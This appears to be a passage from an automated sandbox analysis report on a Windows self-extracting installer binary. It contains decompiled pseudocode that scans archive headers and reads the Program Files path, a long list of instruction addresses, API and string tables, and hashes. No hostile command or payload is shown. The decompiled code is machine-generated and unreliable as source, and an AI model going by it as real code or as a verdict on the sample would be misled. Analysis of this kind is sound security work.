											__ebp - 0xbd58 = E00179BDC(__ecx, __edi, __ebp - 0xbd58, __ebp - 0x4d08,  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi, __ebp - 0xbd58,  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58,  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08);
											__eflags =  *(__ebp - 0xcd58);
											if( *(__ebp - 0xcd58) != 0) {
												_push(__edi);
												__eax = __ebp - 0xcd58;
												_push(__ebp - 0xcd58);
												_push(5);
												_push(0x1000);
												__eax =  *0x1c2078();
											}
											goto L175;
										}
										goto L170;
									}
								}
							case 0xa:
								__eflags = __ebx - 7;
								if(__ebx == 7) {
									 *0x1aa470 = 1;
								}
								goto L175;
							case 0xb:
								__eax =  *(__ebp - 0x3508) & 0x0000ffff;
								__eax = E00186420( *(__ebp - 0x3508) & 0x0000ffff);
								__eflags = __eax - 0x46;
								if(__eax == 0x46) {
									 *0x1a8461 = 1;
								} else {
									__eflags = __eax - 0x55;
									if(__eax == 0x55) {
										 *0x1a8462 = 1;
									} else {
										__eax = 0;
										 *0x1a8461 = __al;
										 *0x1a8462 = __al;
									}
								}
								goto L175;
							case 0xc:
								 *0x1bec99 = 1;
								__eax = __eax + 0x1bec99;
								_t123 = __esi + 0x39;
								 *_t123 =  *(__esi + 0x39) + __esp;
								__eflags =  *_t123;
								__ebp = 0xffffcaf8;
								if( *_t123 != 0) {
									_t125 = __ebp - 0x3508; // 0xffff95f0
									__eax = _t125;
									_push(_t125);
									 *0x19e5fc = E00171798();
								}
								goto L175;
						}
						L4:
						_push(0x1000);
						_push(_t306);
						_push(_t231);
						_t231 = E0017A6C7();
						_t306 = _t306 + 0x2000;
						_t302 = _t302 - 1;
						if(_t302 != 0) {
							goto L4;
						} else {
							_t307 = _t302;
							goto L6;
						}
						L175:
						_push(0x1000);
						_t216 = _t311 - 0x15; // 0xffffcae3
						_t217 = _t311 - 0xd; // 0xffffcaeb
						_t218 = _t311 - 0x3508; // 0xffff95f0
						_t219 = _t311 - 0xfd58; // 0xfffecda0
						_push( *((intOrPtr*)(_t311 + 0xc)));
						_t226 = E0017AA36();
						_t287 =  *((intOrPtr*)(_t311 + 0x10));
						 *((intOrPtr*)(_t311 + 0xc)) = _t226;
					} while (_t226 != 0);
				}
			}

0x0017bdf5
0x0017bdfa
0x0017bdff
0x0017be04
0x0017be0d
0x0017ca90
0x0017ca93
0x0017ca9d
0x0017ca9d
0x0017be13
0x0017be1b
0x0017be1f
0x0017be26
0x0017be2d
0x0017be2e
0x0017be31
0x0017be38
0x0017be3d
0x0017be44
0x0017be49
0x0017be4b
0x0017be51
0x0017be57
0x0017be57
0x00000000
0x0017be71
0x0017be88
0x0017be8c
0x00000000
0x0017be8e
0x00000000
0x0017be8e
0x0017be8c
0x0017be96
0x00000000
0x00000000
0x0017be9c
0x00000000
0x0017bea3
0x0017bea6
0x0017beb9
0x0017bedf
0x0017bef3
0x0017bef6
0x0017bf01
0x0017c045
0x0017c045
0x0017c04d
0x0017c053
0x0017c058
0x0017c05a
0x00000000
0x00000000
0x0017bf13
0x0017bf19
0x0017bf1f
0x0017bfc5
0x0017bfcc
0x0017bfd2
0x0017bfd5
0x00000000
0x00000000
0x0017bfde
0x0017bfe4
0x0017bfe6
0x00000000
0x0017bfe8
0x0017bfe8
0x0017bfea
0x0017bfeb
0x0017bfef
0x0017c003
0x0017c008
0x0017c012
0x0017c018
0x0017c01b
0x0017bfed
0x0017bfed
0x0017bfee
0x00000000
0x0017c01d
0x0017c02b
0x0017c031
0x0017c033
0x0017c03f
0x0017c03f
0x00000000
0x0017c033
0x0017c01b
0x0017bfe6
0x0017bf34
0x0017bf41
0x0017bf52
0x0017bf55
0x0017bf58
0x0017bf6b
0x0017bf72
0x0017bf77
0x0017bf79
0x00000000
0x00000000
0x0017bf7f
0x0017bf86
0x0017bf8b
0x0017bf90
0x0017bf9c
0x0017bfa1
0x0017bfa4
0x0017bfab
0x0017bfad
0x0017bfae
0x0017bfb8
0x0017bfbe
0x0017bfbf
0x00000000
0x0017bfbf
0x0017bf61
0x0017bf67
0x0017bf69
0x00000000
0x00000000
0x00000000
0x0017bf69
0x0017c060
0x0017c06a
0x0017c06a
0x00000000
0x00000000
0x0017c074
0x0017c076
0x0017c07c
0x0017c081
0x0017c083
0x0017c086
0x0017c088
0x0017c095
0x0017c09a
0x0017c09b
0x0017c09b
0x0017c09c
0x0017c09f
0x0017c0a1
0x0017c0ab
0x0017c0ae
0x0017c0b4
0x0017c0b6
0x0017c0a3
0x0017c0a3
0x0017c0a3
0x0017c0bb
0x0017c0bd
0x0017c0c6
0x0017c0c6
0x0017c0c9
0x0017c0ce
0x0017c0d7
0x0017c0d8
0x0017c0de
0x0017c0e3
0x0017c0e6
0x0017c0e8
0x0017c0ea
0x0017c0ef
0x0017c0f1
0x0017c0f3
0x0017c0f3
0x0017c0f5
0x0017c0f5
0x0017c0fa
0x0017c0ff
0x0017c100
0x0017c100
0x0017c101
0x0017c103
0x0017c10a
0x0017c10f
0x0017c103
0x00000000
0x00000000
0x0017c115
0x0017c117
0x0017c127
0x0017c127
0x00000000
0x00000000
0x0017c132
0x0017c134
0x00000000
0x00000000
0x0017c13a
0x0017c141
0x00000000
0x00000000
0x0017c147
0x0017c149
0x0017c14f
0x0017c151
0x0017c158
0x0017c159
0x0017c160
0x0017c162
0x0017c162
0x0017c169
0x0017c16e
0x0017c174
0x0017c176
0x00000000
0x0017c17c
0x0017c17c
0x0017c17f
0x0017c181
0x0017c182
0x0017c185
0x0017c1ae
0x0017c1ae
0x0017c1b1
0x0017c296
0x0017c29f
0x0017c2a4
0x0017c2a4
0x0017c2a6
0x0017c2a6
0x0017c2a8
0x0017c2aa
0x0017c2b1
0x0017c2b6
0x0017c2b7
0x0017c2b8
0x0017c2ba
0x0017c2bc
0x0017c2c0
0x0017c2c2
0x0017c2c2
0x0017c2c4
0x0017c2c4
0x0017c2c0
0x0017c2c8
0x0017c2ce
0x0017c2db
0x0017c2e2
0x0017c2f2
0x0017c2fc
0x0017c30a
0x0017c310
0x0017c318
0x0017c31d
0x0017c31e
0x0017c31f
0x0017c321
0x0017c335
0x0017c335
0x00000000
0x0017c321
0x0017c1b7
0x0017c1ba
0x0017c1c7
0x0017c1c7
0x0017c1ca
0x0017c1cc
0x0017c1cd
0x0017c1cf
0x0017c1d0
0x0017c1d5
0x0017c1da
0x0017c1e0
0x0017c1e2
0x0017c1e4
0x0017c1e7
0x0017c1ee
0x0017c1ef
0x0017c1f5
0x0017c1f6
0x0017c1f9
0x0017c1fa
0x0017c1fb
0x0017c200
0x0017c203
0x0017c209
0x0017c212
0x0017c215
0x0017c21a
0x0017c21c
0x0017c21e
0x0017c220
0x0017c220
0x0017c222
0x0017c222
0x0017c224
0x0017c224
0x0017c22c
0x0017c233
0x0017c235
0x0017c23c
0x0017c242
0x0017c244
0x0017c245
0x0017c24d
0x0017c25c
0x0017c25c
0x0017c24d
0x0017c267
0x0017c269
0x0017c278
0x0017c27e
0x0017c284
0x0017c28f
0x0017c28f
0x00000000
0x0017c284
0x0017c1bc
0x0017c1c1
0x00000000
0x00000000
0x00000000
0x0017c1c1
0x0017c187
0x0017c18b
0x00000000
0x00000000
0x0017c18d
0x0017c190
0x0017c192
0x0017c195
0x00000000
0x00000000
0x0017c1a4
0x00000000
0x0017c1a4
0x00000000
0x0017c340
0x0017c341
0x0017c346
0x0017c348
0x0017c34a
0x0017c34b
0x0017c34b
0x00000000
0x0017c381
0x0017c388
0x0017c38a
0x0017c38a
0x0017c38c
0x0017c3bb
0x0017c3bb
0x0017c3c1
0x00000000
0x0017c3c1
0x0017c38e
0x0017c38e
0x0017c391
0x0017c3aa
0x0017c3b0
0x0017c3b0
0x00000000
0x0017c3b0
0x0017c393
0x0017c393
0x0017c396
0x00000000
0x00000000
0x0017c398
0x0017c398
0x0017c39b
0x00000000
0x00000000
0x0017c3a1
0x00000000
0x00000000
0x0017c40e
0x0017c410
0x0017c417
0x0017c418
0x0017c41e
0x0017c426
0x0017c4ca
0x0017c4ca
0x0017c4ce
0x0017c4e5
0x0017c4e5
0x0017c4e9
0x0017c4ef
0x0017c4f2
0x0017c4f8
0x0017c4fa
0x0017c4fb
0x0017c4fc
0x0017c4fd
0x0017c500
0x0017c500
0x0017c4f2
0x00000000
0x0017c4e9
0x0017c4d0
0x0017c4d3
0x00000000
0x00000000
0x0017c4d9
0x0017c4db
0x0017c4dc
0x0017c4dd
0x0017c4e0
0x00000000
0x0017c4e0
0x0017c42c
0x0017c432
0x0017c434
0x0017c435
0x0017c43a
0x0017c43b
0x0017c43c
0x0017c43e
0x00000000
0x00000000
0x0017c444
0x0017c444
0x0017c447
0x0017c44a
0x0017c44a
0x0017c44c
0x0017c44f
0x0017c455
0x0017c457
0x0017c458
0x0017c45e
0x0017c45f
0x0017c464
0x0017c466
0x0017c468
0x00000000
0x00000000
0x0017c46a
0x0017c472
0x00000000
0x00000000
0x0017c479
0x0017c480
0x0017c485
0x0017c48c
0x0017c48e
0x0017c490
0x0017c497
0x0017c49c
0x0017c49e
0x0017c4a0
0x0017c4a2
0x0017c4a2
0x0017c4a8
0x0017c4af
0x0017c4b4
0x0017c4b6
0x0017c4b8
0x0017c4ba
0x0017c4ba
0x0017c4bb
0x0017c4bd
0x0017c4c3
0x0017c4c4
0x0017c4c4
0x0017c4c7
0x00000000
0x00000000
0x0017c534
0x0017c537
0x0017c6b8
0x0017c6b8
0x0017c6bb
0x0017c6c1
0x0017c6c8
0x0017c6ca
0x0017c6ca
0x0017c6d4
0x0017c6d4
0x00000000
0x0017c6bb
0x0017c53d
0x0017c543
0x0017c551
0x0017c55d
0x0017c55f
0x0017c561
0x0017c566
0x0017c566
0x0017c57e
0x0017c58b
0x0017c590
0x0017c592
0x00000000
0x00000000
0x0017c564
0x0017c564
0x0017c565
0x0017c565
0x0017c59e
0x0017c5a4
0x0017c5ac
0x00000000
0x00000000
0x0017c5b2
0x0017c5b9
0x00000000
0x00000000
0x0017c5bf
0x0017c5c1
0x0017c5c8
0x0017c5ce
0x0017c5d0
0x0017c5d1
0x0017c5d6
0x0017c5d7
0x0017c5d8
0x0017c5da
0x0017c62e
0x0017c62e
0x0017c636
0x0017c644
0x0017c655
0x0017c663
0x0017c663
0x0017c66f
0x0017c674
0x0017c676
0x0017c686
0x0017c690
0x0017c695
0x0017c698
0x00000000
0x0017c69e
0x0017c6a3
0x0017c6a3
0x0017c6a5
0x0017c6ac
0x0017c6b2
0x00000000
0x0017c6b2
0x0017c698
0x0017c5dc
0x0017c5de
0x0017c5e0
0x0017c5e7
0x00000000
0x00000000
0x0017c5e9
0x0017c5eb
0x0017c5f1
0x0017c5f1
0x0017c5f5
0x00000000
0x00000000
0x0017c5f7
0x0017c5f8
0x0017c5fe
0x0017c601
0x0017c603
0x0017c606
0x00000000
0x00000000
0x00000000
0x0017c608
0x0017c615
0x0017c61f
0x0017c624
0x0017c624
0x0017c626
0x00000000
0x00000000
0x0017c6e0
0x0017c6e3
0x0017c6e5
0x0017c6ec
0x0017c6ee
0x0017c6f4
0x0017c6f5
0x0017c6fa
0x0017c6fb
0x0017c6fb
0x0017c700
0x0017c703
0x0017c709
0x0017c709
0x0017c70e
0x00000000
0x00000000
0x0017c71a
0x0017c71d
0x00000000
0x00000000
0x0017c723
0x0017c725
0x0017c72c
0x0017c734
0x0017c73a
0x0017c73f
0x0017c742
0x0017c777
0x0017c77c
0x0017c782
0x0017c783
0x0017c788
0x0017c744
0x0017c744
0x0017c747
0x0017c74d
0x0017c763
0x0017c768
0x0017c769
0x0017c76e
0x0017c74f
0x0017c74f
0x0017c754
0x0017c755
0x0017c75a
0x0017c75a
0x0017c74d
0x0017c78f
0x0017c791
0x0017c798
0x0017c7a6
0x0017c7ad
0x0017c7b2
0x0017c7b3
0x0017c7b4
0x0017c7b6
0x0017c7b7
0x0017c7be
0x0017c80e
0x0017c813
0x0017c815
0x00000000
0x00000000
0x0017c81b
0x0017c81d
0x0017c823
0x0017c82a
0x00000000
0x00000000
0x0017c82c
0x0017c82e
0x0017c82f
0x0017c82f
0x0017c832
0x0017c835
0x0017c83f
0x0017c83f
0x0017c841
0x0017c843
0x0017c84d
0x0017c852
0x0017c854
0x0017c892
0x0017c895
0x0017c895
0x0017c897
0x0017c898
0x0017c898
0x00000000
0x0017c898
0x0017c856
0x0017c858
0x0017c859
0x0017c85b
0x0017c85e
0x0017c873
0x0017c875
0x0017c876
0x0017c876
0x0017c879
0x0017c879
0x0017c87e
0x0017c87f
0x0017c885
0x0017c885
0x0017c886
0x0017c88b
0x0017c88c
0x0017c88d
0x00000000
0x0017c88d
0x0017c860
0x0017c867
0x0017c86a
0x0017c86b
0x00000000
0x0017c86b
0x0017c837
0x0017c839
0x0017c83a
0x0017c83d
0x00000000
0x00000000
0x00000000
0x0017c89a
0x0017c89a
0x0017c89d
0x0017c89d
0x0017c8a2
0x0017c8a4
0x0017c8a6
0x0017c8a6
0x0017c8a8
0x0017c8a8
0x00000000
0x0017c7c0
0x0017c7c7
0x0017c7d3
0x0017c7d9
0x0017c7da
0x0017c7db
0x0017c7e0
0x0017c7e3
0x0017c7e5
0x0017c7eb
0x0017c7ed
0x0017c7fb
0x0017c800
0x0017c801
0x0017c801
0x0017c8ab
0x0017c8ab
0x0017c8b3
0x0017c8b8
0x0017c8c2
0x0017c8c9
0x0017c8c9
0x0017c8d6
0x0017c8dd
0x0017c8e2
0x0017c8ea
0x0017c8f6
0x0017c8f6
0x0017c903
0x0017c908
0x0017c910
0x0017c91a
0x0017c927
0x0017c92e
0x0017c92e
0x0017c93a
0x0017c941
0x0017c946
0x0017c94e
0x0017c954
0x0017c955
0x0017c956
0x0017c958
0x0017c958
0x0017c96d
0x0017c972
0x0017c97e
0x0017c980
0x0017c991
0x0017c99e
0x00000000
0x0017c982
0x0017c98d
0x0017c98f
0x0017c9a3
0x0017c9a3
0x0017c9a5
0x0017c9ab
0x0017c9b1
0x0017c9bf
0x0017c9c4
0x0017c9c5
0x0017c9cd
0x0017c9d2
0x0017c9d9
0x0017c9df
0x0017c9e1
0x0017c9e7
0x0017c9ed
0x0017c9ef
0x0017c9f8
0x0017c9fb
0x0017c9fd
0x0017ca06
0x0017ca09
0x0017ca0f
0x0017ca12
0x0017ca1b
0x0017ca2a
0x0017ca2f
0x0017ca37
0x0017ca39
0x0017ca3a
0x0017ca40
0x0017ca41
0x0017ca43
0x0017ca48
0x0017ca48
0x00000000
0x0017ca37
0x00000000
0x0017c98f
0x0017c980
0x00000000
0x0017ca50
0x0017ca53
0x0017ca55
0x0017ca55
0x00000000
0x00000000
0x0017c3cd
0x0017c3d5
0x0017c3db
0x0017c3de
0x0017c402
0x0017c3e0
0x0017c3e0
0x0017c3e3
0x0017c3f6
0x0017c3e5
0x0017c3e5
0x0017c3e7
0x0017c3ec
0x0017c3ec
0x0017c3e3
0x00000000
0x00000000
0x0017c50a
0x0017c50b
0x0017c510
0x0017c510
0x0017c510
0x0017c513
0x0017c518
0x0017c51e
0x0017c51e
0x0017c524
0x0017c52a
0x0017c52a
0x00000000
0x00000000
0x0017be58
0x0017be58
0x0017be5d
0x0017be5e
0x0017be5f
0x0017be64
0x0017be6a
0x0017be6d
0x00000000
0x0017be6f
0x0017be6f
0x00000000
0x0017be6f
0x0017ca5c
0x0017ca5c
0x0017ca61
0x0017ca65
0x0017ca69
0x0017ca70
0x0017ca77
0x0017ca7a
0x0017ca7f
0x0017ca82
0x0017ca85
0x0017ca8f

APIs

__EH_prolog.LIBCMT ref: 0017BDFA

Part of subcall function 0017AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0017AAFE

SetWindowTextW.USER32(?,?), ref: 0017C127
_wcsrchr.LIBVCRUNTIME ref: 0017C2B1
GetDlgItem.USER32(?,00000066), ref: 0017C2EC
SetWindowTextW.USER32(00000000,?), ref: 0017C2FC
SendMessageW.USER32(00000000,00000143,00000000,001AA472), ref: 0017C30A
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0017C335

Strings

%s.%d.tmp, xrefs: 0017BFF6
Software\Microsoft\Windows\CurrentVersion, xrefs: 0017C1D0
ProgramFilesDir, xrefs: 0017C1FB
<br>, xrefs: 0017C08A

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: 05d41ad17fd509120093cd338703d54ab317412c28d1a87e39c8649d9da0ad24
Instruction ID: 741bb136d5d291129dbd6ce678b78fbb1cb0f72207a35b50e56f610029505ab0
Opcode Fuzzy Hash: 05d41ad17fd509120093cd338703d54ab317412c28d1a87e39c8649d9da0ad24
Instruction Fuzzy Hash: D9E15176D04118AADF25EBA4DC45EEF777CAF18711F5480AAF509E3051EB709B848FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0016D341, Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0016D341(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t200;
				void* _t201;
				WCHAR* _t202;
				void* _t207;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t232;
				void* _t233;
				void* _t236;
				signed int _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t248;
				signed int _t252;
				signed int _t266;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t277;
				void* _t278;
				signed int _t283;
				char* _t284;
				signed int _t288;
				short _t291;
				void* _t292;
				signed int _t298;
				signed int _t303;
				void* _t306;
				void* _t308;
				void* _t311;
				signed int _t320;
				intOrPtr* _t322;
				unsigned int _t332;
				signed int _t334;
				unsigned int _t337;
				signed int _t340;
				void* _t347;
				signed int _t352;
				signed int _t355;
				signed int _t356;
				signed int _t361;
				signed int _t365;
				void* _t374;
				signed int _t376;
				signed int _t377;
				void* _t378;
				void* _t379;
				intOrPtr* _t380;
				signed int _t381;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				intOrPtr* _t391;
				signed int _t393;
				void* _t394;
				void* _t396;
				void* _t398;
				void* _t402;
				void* _t403;

				_t374 = __edx;
				_t322 = __ecx;
				E0017E28C(E00191F25, _t394);
				E0017E360();
				_t200 = 0x5c;
				_push(0x42f8);
				_push( *((intOrPtr*)(_t394 + 8)));
				_t391 = _t322;
				 *((intOrPtr*)(_t394 - 0x40)) = _t200;
				 *((intOrPtr*)(_t394 - 0x3c)) = _t391;
				_t201 = E001815E8(_t322);
				_t320 = 0;
				_t400 = _t201;
				_t202 = _t394 - 0x12dc;
				if(_t201 != 0) {
					E0016FE56(_t202,  *((intOrPtr*)(_t394 + 8)), 0x800);
				} else {
					GetModuleFileNameW(0, _t202, 0x800);
					 *((short*)(E0016BC85(_t400, _t394 - 0x12dc))) = 0;
					E0016FE2E(_t400, _t394 - 0x12dc,  *((intOrPtr*)(_t394 + 8)), 0x800);
				}
				E00169619(_t394 - 0x2304);
				_push(4);
				 *(_t394 - 4) = _t320;
				_push(_t394 - 0x12dc);
				if(E001699B0(_t394 - 0x2304, _t391) == 0) {
					L57:
					_t207 = E00169653(_t394 - 0x2304, _t391); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t394 - 0xc));
					return _t207;
				} else {
					_t384 = _t320;
					_t402 =  *0x19e5f4 - _t384; // 0x63
					if(_t402 <= 0) {
						L7:
						E00185A90(_t320, _t384, _t391,  *_t391,  *((intOrPtr*)(_t391 + 4)), 4, E0016CFB0);
						E00185A90(_t320, _t384, _t391,  *((intOrPtr*)(_t391 + 0x14)),  *((intOrPtr*)(_t391 + 0x18)), 4, E0016CF10);
						_t398 = _t396 + 0x20;
						 *(_t394 - 0x15) = _t320;
						_t385 = _t384 | 0xffffffff;
						 *(_t394 - 0x2c) = _t320;
						 *(_t394 - 0x20) = _t385;
						while(_t385 == 0xffffffff) {
							 *(_t394 - 0x10) = E00169E40();
							_t298 = E00169BF0(_t394 - 0x2304, _t374, _t394 - 0x4304, 0x2000);
							 *(_t394 - 0x28) = _t298;
							_t388 = _t320;
							_t25 = _t298 - 0x10; // -16
							_t365 = _t25;
							 *(_t394 - 0x30) = _t365;
							if(_t365 < 0) {
								L25:
								_t299 =  *(_t394 - 0x10);
								_t385 =  *(_t394 - 0x20);
								L26:
								E00169D30(_t394 - 0x2304, _t394, _t299 +  *(_t394 - 0x28) + 0xfffffff0, _t320, _t320);
								_t303 =  *(_t394 - 0x2c) + 1;
								 *(_t394 - 0x2c) = _t303;
								__eflags = _t303 - 0x100;
								if(_t303 < 0x100) {
									continue;
								}
								__eflags = _t385 - 0xffffffff;
								if(_t385 == 0xffffffff) {
									goto L57;
								}
								break;
							}
							L10:
							while(1) {
								if( *((char*)(_t394 + _t388 - 0x4304)) != 0x2a ||  *((char*)(_t394 + _t388 - 0x4303)) != 0x2a) {
									L14:
									_t374 = 0x2a;
									if( *((intOrPtr*)(_t394 + _t388 - 0x4304)) != _t374) {
										L18:
										if( *((char*)(_t394 + _t388 - 0x4304)) != 0x52 ||  *((char*)(_t394 + _t388 - 0x4303)) != 0x61) {
											L21:
											_t388 = _t388 + 1;
											if(_t388 >  *(_t394 - 0x30)) {
												goto L25;
											}
											_t298 =  *(_t394 - 0x28);
											continue;
										} else {
											_t306 = E00185EC0(_t394 - 0x4302 + _t388, 0x1938ec, 4);
											_t398 = _t398 + 0xc;
											if(_t306 == 0) {
												goto L57;
											}
											goto L21;
										}
									}
									_t370 = _t394 - 0x4300 + _t388;
									if( *((intOrPtr*)(_t394 - 0x4300 + _t388 - 2)) == _t374 && _t388 <= _t298 + 0xffffffe0) {
										_t308 = E00185808(_t370, L"*messages***", 0xb);
										_t398 = _t398 + 0xc;
										if(_t308 == 0) {
											 *(_t394 - 0x15) = 1;
											goto L24;
										}
									}
									goto L18;
								} else {
									_t311 = E00185EC0(_t394 - 0x4302 + _t388, "*messages***", 0xb);
									_t398 = _t398 + 0xc;
									if(_t311 == 0) {
										L24:
										_t299 =  *(_t394 - 0x10);
										_t385 = _t388 +  *(_t394 - 0x10);
										 *(_t394 - 0x20) = _t385;
										goto L26;
									}
									_t298 =  *(_t394 - 0x28);
									goto L14;
								}
							}
						}
						asm("cdq");
						E00169D30(_t394 - 0x2304, _t394, _t385, _t374, _t320);
						_push(0x200002);
						_t386 = E001835D3(_t394 - 0x2304);
						 *(_t394 - 0x1c) = _t386;
						__eflags = _t386;
						if(_t386 == 0) {
							goto L57;
						}
						_t332 = E00169BF0(_t394 - 0x2304, _t374, _t386, 0x200000);
						 *(_t394 - 0x20) = _t332;
						__eflags =  *(_t394 - 0x15);
						if( *(_t394 - 0x15) == 0) {
							_push(2 + _t332 * 2);
							_t216 = E001835D3(_t332);
							 *(_t394 - 0x30) = _t216;
							__eflags = _t216;
							if(_t216 == 0) {
								goto L57;
							}
							_t334 =  *(_t394 - 0x20);
							 *(_t334 + _t386) = _t320;
							__eflags = _t334 + 1;
							E0017137A(_t386, _t216, _t334 + 1);
							L001835CE(_t386);
							_t386 =  *(_t394 - 0x30);
							_t337 =  *(_t394 - 0x20);
							 *(_t394 - 0x1c) = _t386;
							L33:
							_t219 = 0x100000;
							__eflags = _t337 - 0x100000;
							if(_t337 <= 0x100000) {
								_t219 = _t337;
							}
							 *((short*)(_t386 + _t219 * 2)) = 0;
							E0016FDFB(_t394 - 0x14c, 0x1938f4, 0x64);
							_push(0x20002);
							_t222 = E001835D3(0);
							 *(_t394 - 0x10) = _t222;
							__eflags = _t222;
							if(_t222 != 0) {
								__eflags =  *(_t394 - 0x20);
								_t340 = _t320;
								_t375 = _t320;
								 *(_t394 - 0x14) = _t340;
								 *(_t394 - 0x84) = _t320;
								_t387 = _t320;
								 *(_t394 - 0x28) = _t320;
								if( *(_t394 - 0x20) <= 0) {
									L54:
									E0016CE72(_t391, _t375, _t394 - 0x84, _t222, _t340);
									L001835CE( *(_t394 - 0x1c));
									L001835CE( *(_t394 - 0x10));
									__eflags =  *((intOrPtr*)(_t391 + 0x2c)) - _t320;
									if( *((intOrPtr*)(_t391 + 0x2c)) <= _t320) {
										L56:
										 *0x1a0f94 =  *((intOrPtr*)(_t391 + 0x28));
										E00185A90(_t320, _t387, _t391,  *((intOrPtr*)(_t391 + 0x3c)),  *((intOrPtr*)(_t391 + 0x40)), 4, E0016D070);
										E00185A90(_t320, _t387, _t391,  *((intOrPtr*)(_t391 + 0x50)),  *((intOrPtr*)(_t391 + 0x54)), 4, E0016D0A0);
										goto L57;
									} else {
										goto L55;
									}
									do {
										L55:
										E00173781(_t391 + 0x3c, _t375, _t320);
										E00173781(_t391 + 0x50, _t375, _t320);
										_t320 = _t320 + 1;
										__eflags = _t320 -  *((intOrPtr*)(_t391 + 0x2c));
									} while (_t320 <  *((intOrPtr*)(_t391 + 0x2c)));
									goto L56;
								}
								 *((intOrPtr*)(_t394 - 0x34)) = 0xd;
								 *((intOrPtr*)(_t394 - 0x38)) = 0xa;
								 *(_t394 - 0x30) = 9;
								do {
									_t232 =  *(_t394 - 0x1c);
									__eflags = _t387;
									if(_t387 == 0) {
										L80:
										_t376 =  *(_t232 + _t387 * 2) & 0x0000ffff;
										_t387 = _t387 + 1;
										__eflags = _t376;
										if(_t376 == 0) {
											break;
										}
										__eflags = _t376 -  *((intOrPtr*)(_t394 - 0x40));
										if(_t376 !=  *((intOrPtr*)(_t394 - 0x40))) {
											_t233 = 0xd;
											__eflags = _t376 - _t233;
											if(_t376 == _t233) {
												L99:
												E0016CE72(_t391,  *(_t394 - 0x28), _t394 - 0x84,  *(_t394 - 0x10), _t340);
												 *(_t394 - 0x84) = _t320;
												_t340 = _t320;
												 *(_t394 - 0x28) = _t320;
												L98:
												 *(_t394 - 0x14) = _t340;
												goto L52;
											}
											_t236 = 0xa;
											__eflags = _t376 - _t236;
											if(_t376 == _t236) {
												goto L99;
											}
											L96:
											__eflags = _t340 - 0x10000;
											if(_t340 >= 0x10000) {
												goto L52;
											}
											 *( *(_t394 - 0x10) + _t340 * 2) = _t376;
											_t340 = _t340 + 1;
											__eflags = _t340;
											goto L98;
										}
										__eflags = _t340 - 0x10000;
										if(_t340 >= 0x10000) {
											goto L52;
										}
										_t239 = ( *(_t232 + _t387 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t239;
										if(_t239 == 0) {
											_push(0x22);
											L93:
											_pop(_t381);
											 *( *(_t394 - 0x10) + _t340 * 2) = _t381;
											_t340 = _t340 + 1;
											 *(_t394 - 0x14) = _t340;
											_t387 = _t387 + 1;
											goto L52;
										}
										_t241 = _t239 - 0x3a;
										__eflags = _t241;
										if(_t241 == 0) {
											_push(0x5c);
											goto L93;
										}
										_t242 = _t241 - 0x12;
										__eflags = _t242;
										if(_t242 == 0) {
											_push(0xa);
											goto L93;
										}
										_t243 = _t242 - 4;
										__eflags = _t243;
										if(_t243 == 0) {
											_push(0xd);
											goto L93;
										}
										__eflags = _t243 != 0;
										if(_t243 != 0) {
											goto L96;
										}
										_push(9);
										goto L93;
									}
									_t377 =  *(_t232 + _t387 * 2 - 2) & 0x0000ffff;
									__eflags = _t377 -  *((intOrPtr*)(_t394 - 0x34));
									if(_t377 ==  *((intOrPtr*)(_t394 - 0x34))) {
										L42:
										_t347 = 0x3a;
										__eflags =  *(_t232 + _t387 * 2) - _t347;
										if( *(_t232 + _t387 * 2) != _t347) {
											L71:
											 *(_t394 - 0x24) = _t232 + _t387 * 2;
											_t248 = E0016FCBF( *(_t232 + _t387 * 2) & 0x0000ffff);
											__eflags = _t248;
											if(_t248 == 0) {
												L79:
												_t340 =  *(_t394 - 0x14);
												_t232 =  *(_t394 - 0x1c);
												goto L80;
											}
											E0016FE56(_t394 - 0x2dc,  *(_t394 - 0x24), 0x64);
											_t252 = E00185885(_t394 - 0x2dc, L" \t,");
											 *(_t394 - 0x24) = _t252;
											__eflags = _t252;
											if(_t252 == 0) {
												goto L79;
											}
											 *_t252 = 0;
											E00171596(_t394 - 0x2dc, _t394 - 0x1b0, 0x64);
											E0016FDFB(_t394 - 0xe8, _t394 - 0x14c, 0x64);
											E0016FDD4(__eflags, _t394 - 0xe8, _t394 - 0x1b0, 0x64);
											E0016FDFB(_t394 - 0x84, _t394 - 0xe8, 0x32);
											_t266 = E001858D9(_t320, 0, _t387, _t391, _t394 - 0xe8,  *_t391,  *((intOrPtr*)(_t391 + 4)), 4, E0016D050);
											_t398 = _t398 + 0x14;
											__eflags = _t266;
											if(_t266 != 0) {
												_t272 =  *_t266 * 0xc;
												__eflags = _t272;
												_t169 = _t272 + 0x19e150; // 0x28b64ee0
												 *(_t394 - 0x28) =  *_t169;
											}
											_t387 = _t387 + ( *(_t394 - 0x24) - _t394 - 0x2dc >> 1) + 1;
											__eflags = _t387;
											_t271 =  *(_t394 - 0x1c);
											_t378 = 0x20;
											while(1) {
